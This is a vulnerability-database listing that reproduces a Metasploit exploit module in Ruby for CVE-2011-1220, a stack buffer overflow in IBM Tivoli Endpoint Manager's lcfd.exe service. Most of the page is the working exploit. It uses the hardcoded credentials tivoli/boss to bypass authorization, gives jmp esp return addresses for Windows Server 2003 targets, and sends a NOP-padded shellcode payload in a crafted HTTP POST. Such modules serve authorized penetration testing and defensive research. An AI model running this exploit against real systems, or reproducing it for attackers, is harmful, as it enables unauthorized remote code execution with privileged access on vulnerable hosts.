IBM Tivoli Endpoint Manager POST Query Buffer Overflow

2011-06-11T23:48:18
ID MSF:EXPLOIT/WINDOWS/HTTP/IBM_TIVOLI_ENDPOINT_BOF
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Tivoli Endpoint Manager POST Query Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in the way IBM Tivoli
        Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query
        arguments.

        This issue can be triggered by sending a specially crafted HTTP POST request to
      the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization
      is required. This exploit makes use of a second vulnerability, a hardcoded account
      (tivoli/boss) is used to bypass the authorization restriction.
      },
      'Author'         =>
        [
          'bannedit', # metasploit module
          'Jeremy Brown <0xjbrown[at]gmail.com>', # original public exploit
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1220'],
          [ 'OSVDB', '72713'], # buffer overflow
          [ 'OSVDB', '72751'], # hardcoded account
          [ 'BID', '48049'],
          [ 'ZDI', '11-169' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0d\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows Server 2003 SP0', { 'Ret' => 0x77d80787 }], # user32.dll - jmp esp
          ['Windows Server 2003 SP1', { 'Ret' => 0x77403680 }], # user32.dll - jmp esp
          ['Windows Server 2003 SP2', { 'Ret' => 0x77402680 }], # user32.dll - jmp esp
        ],
      'DisclosureDate' => 'May 31 2011'))

    register_options(
      [
        Opt::RPORT(9495),
      ])
  end

  def exploit
    print_status("Trying target #{target.name}...")

    auth = Rex::Text.encode_base64("tivoli:boss")
    varname = rand_text_alpha(rand(10))

    sploit = make_nops(1) * 256
    sploit << [target.ret].pack('V')
    sploit << payload.encoded

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri'          => '/addr',
      'method'       => 'POST',
      'headers'      =>
      {
        'Authorization' => "Basic #{auth}"
      },
      'vars_post'    =>
      {
        varname => sploit,
      },
    }, 5)

    handler
  end
end